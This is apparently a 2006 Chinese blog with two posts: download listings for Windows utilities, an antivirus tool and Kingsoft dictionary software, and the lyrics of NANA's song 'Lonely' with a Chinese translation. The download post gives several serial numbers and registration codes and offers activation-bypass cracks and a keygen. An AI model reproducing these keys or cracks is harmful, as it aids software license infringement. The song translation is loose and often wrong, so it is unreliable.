理员、文件还原/ 清理。扩展操作系统的能力:通过TuneUp Utilities 2004,
你能使Windows 运行更快、更安全、更舒适。其现代图形界面包括所有系统设置、
安全设定、清理和维护等功能。
使用说明:
1.解压后导入 注册.reg文件
2.软件的主程序是 Integrator.exe
点此下载
强力的宽带优化工具
DSL Speed v3.0 英文版
软件大小: 1.28 MB
在线自动检测获得最佳优化参数从而使DSL (e.g., ADSL , G.lite , IDSL,
SDSL)连接速度达到最大值。获得Topshareware.com、Filetransit.com 、Brothersoft.com
等下载网站5 星评价。
Name : crsky
Number : PDBF33JPCUQA
点此下载
木马查杀最普及的软件,尽人皆知
木马克星(iparmor) v5.47.0825
软件大小: 2.77 MB
木马克星乃本站原创反黑客-杀木马工具,可以查杀8122种国际木马,1053
种密码偷窃木马,保证查杀传奇密码偷窃木马,oicq类寄生木马,冰河类文件关
联木马,密码解霸,奇迹射手等游戏密码邮寄木马,内置木马防火墙,任何黑客
程序试图发送密码邮件,都需要Iparmor 确认,不仅可以查杀木马,更可以反查
黑客密码。
已含升级程序
用户名:木马克星赠送
注册码:276779514
点此下载
包括Bt+Http,词霸,快译2006 原版,及免激活破解
金山词霸2006+金山快译2006原版镜像ISO+免激活补丁-绝对可下
金山词霸2006+金山快译2006原版镜像ISO--种子
金山词霸2006--高速
金山快译2006全功能绿色精简版
金山快译 2006 HTTP高速下载
金山词霸2006--免激活破解
金山快译 2006 免激活破解
点此下载
永具魅力的经典回忆
迅雷下载--〉新东方《4+1》flash全部教程
点此下载--〉李阳疯狂英语全套
点此下载--〉Photoshop高级案例设计 CD光盘版 (视屏教程)
点此下载--〉卡巴斯基 5.0372绿色免安装全功能正式版
点此下载--〉真正★高速★office 2003专业版★企业版
点此下载--〉全世界32539首Lrc格式歌词,十分难得
点此下载--〉中国古典四大名著- 语音版 v1.9
点此下载--〉金庸作品全集 v1.6 Final 语音朗读版
QQ 号码签发机 纯真3版
全能绿色播放器---〉扔掉暴风影音吧,最强的全能播放器近日更新 KMPlayer 2.8.1020 中文版超强的8大功能
不错的包裹---〉7000余首手机铃声和手机工具下载
让你振颤的效果---〉年度论坛最火爆下载64k-3d动画10款,全收集
多么令人怀念的游戏呀--〉魂斗罗 v2.6 风雪之战(硬盘版)
点此下载--〉金山毒霸2005正版免费升级版下载+最新序列号+通行证这册+剑盟毒霸2005注册机最终纪念
http://www.jj.js.cn/bbs/index.asp?boardid=23&page=
单词方面→疯狂单词2005 真人语音标准版 3.06
∷软件简介∷
疯狂单词在总结比较了数十种传统单词速记法的基础上,结合先进的计算机人工智能技术,首创了无忧单词记忆智能系统,第一次将机器学习,专家系统中的部分人工智能模型应用于单词记忆,并取得了巨大成功,被公认为智能化程度最高的单词记忆软件,2001年被中国软件行业协会评为学习类唯一优秀软件。2003年被世界权威电脑评测杂志《CHIP新电脑》评为“挑战记忆极限”编辑推荐背单词软件!2004年新浪下载突破百万,位列学习软件之首。疯狂单词依靠内建的词汇量动态估测,自动难度进级,效果自适应复习,随机试题生成、联想记忆等智能块,以及数百万字专家整理的记法例句记忆库,用户可以轻松进入一种疯狂状态,将单词记忆的效率发挥到及至。更兼有先进的真人语音和电脑语音合成技术和从小学到专业英语的数百个海量词汇库,让你轻松越过英语学习的第一道难关。
疯狂单词mp3制作功能的特色:疯狂单词MP3免费版强力推荐)
点此下载
posted @
2006-07-09 13:03 MEYE 阅读(888) |
评论 (1) |
编辑 收藏
孤独的灵魂.全球点击率最高的歌
歌手NANA出生於非洲迦纳的一个富有家庭,很小的时候父亲就离他而去,母亲带著年幼的 Nana 到德国定居。肤色的歧视,家庭的破碎,使得NANA从小就在压抑的环境中生存。这首 Lonely 是他最有名的作品,也是最感人的作品之一。在这首歌曲中,爱情的失败,世事的的无奈,人与人之间的勾心斗角,都被他赤裸裸的展露在你面前。动情处的伤心呐喊,颓废时的无奈低吟,节奏布鲁斯,跳舞音乐,HIP HOP结合地天衣无缝。
NANA - LONELY
I am lonely lonely lonely
孤独的,孤独的,孤独的我
I am lonely lonely in my life
我的生活中只有,只有孤独
I am lonely lonely lonely
孤独的,孤独的,孤独的我
God help me help me to survive!
神呀,你来助我
Remember first time we met day one
记起第一次我们相见
Kids in the garden\' playin\'
花园里嬉戏,
games heaven\' fun
天堂般的乐趣
Excitin\' and amazin\' havin\'
只有呀兴奋,和疯疯颠颠
a real friend of mine
真心朋友
Feel my heartbeat and for
我的心在跳
real friend of mine
那一刻,我们面对面
Face to face and eye to eye
你望着我的眼睛,我望着你的眼睛
Usin\' our hands to buy and supply
我们的手也握在一起
Chillin\' is cool from january to june
一月到六月的天都是寒气
And we still stiked together
我俩在一起
like the glue
如胶似漆
And know the rules
真是良缘天赐
Forever you and i and believe
我们丝毫没有怀疑
it was clear
真的
If i ever should fall
如果我倒下去
i could count on you with no fear
想到有你,我就无所畏惧
Runnin\' out of time i see who\'s fake
可转眼一切都已过去,我看到你戴着假面具
Alone without protection
孤独像一条一条蛇
from all them snakes
一起来缠着我,
All for one one for all i was told
后悔有什么用,一切都已过去
Black white yellow no matter
不管什么颜色,我不在乎
if your young or old
你年轻还是年老
Nana\'s in the house to let you know
家里的娜娜告诉你:
What i see is how i fell and damn
我看到的只是我的伤悲
I\'m alone
孤独的我
I am lonely lonely lonely
孤独的,孤独的,孤独的我
I am lonely lonely in my life
我的生活只有孤独,孤独
I am lonely lonely lonely
孤独的,孤独的,孤独的我
God help me help me to survive!
神呀,你来帮助我
Everybody\'s tripppin\' on me
每个人都在与我过意不去
Oh lord come help me please
哦,主啊,请来助我
I did some bad things in my life
过去的我有何过错
Why can\'t you rescue me
为何你却不来拯救我
\'cause you\'ve got all i need
是你给了我一切
I know i got to pay the price
我知道我是咎由自取
Cheppin\' thru the streets at night
混乱,还有争斗
after a fuss and fight
夜晚的街在颤抖
Tears in my eyes i\'m a man
眼中充满泪水,
lookin\' for the light
我四处寻找光明
Dark is the path
可黑暗挡道
i know he will rescue me
我知道主会来救我
The lord is my Shepard
主呀,我的牧羊人
i\'m cool despite emergency
我从未感觉,天是这么冷
Whom shall i fear exept the god
上帝,只有你我才不让我恐惧
Thank you for the blessin\' a
感谢你,
nd the skils on the mic
时刻在保佑我
Five years we know there\'s no diggity
五年过去
Free at last see the light in me
终于,我心中再现光明
What goes up must come down
怎样来还怎样去
I\'ll be around while you
有我在身边
heading towards deathtown
哪怕走向死亡深渊
Allways look forward hardly
一直向前走
never look back
永不回头
So many tears and
泪水啊浇在心头
the snakes on my jock
还有孤独紧紧缠着我
Now i\'m riding in my big fat ride
我
Your ass is late so look for the line
你迟了,还在左顾右盼
Nana in the house to let you know
娜娜在家,你知道
What i see is how
我看到
i feel so leave me alone
我是如此的孤独
I am lonely lonely lonely
孤独的,孤独的,孤独的我
I am lonely lonely in my life
我的生活里只有孤独,孤独
I am lonely lonely lonely
孤独的,孤独的,孤独的我
God help me help me to survive!
神呀,来助我
Knock on my door whom you lookin\' for
敲门人,你在找谁
A dream or reality enemies at my door
是梦境还是敌人
Eyes i realize
是幻想,
it\'s fantasize i must be high
我必须抛开
So let me live before i die
只要没死,我就要活
Once again grab the
再一次
bottle twist the cap
抓起瓶,拧开盖子
To survive your life
救命
is yours my life is mine
你的命是你的,我的命是我自己的
No emotions in this world full of lies
欺骗的世界里,还讲什么感情
Step by step and be versatile
你有你的,我有我的方向
Love peace and cash
爱和平和爱钱
that\'s what is\'s all about
一切都无法改变
Alone by yourself than you
是你亲手酿成孤独
lack there\'s no doubt about
毫无疑问
I\'m always into something
我总是要求
making moves to improve
变化提高
What would you do
你能做什么
if you were in my shoes
如果你在我的脚下
Boom a letter oops another suicide
写好遗书,再来一次自杀
Meet me for a ride at the boulevard
在林荫大道上骑车遇见我
Nana\'s in the house to let you know
娜娜在家,你知道
What i see is how i feel
我看到
and damn i\'m alone
只有死一般,孤独的我
↑↑↑
这就是歌手NANA
posted @
2006-07-06 19:58 MEYE 阅读(3333) |
评论 (3) |
编辑 收藏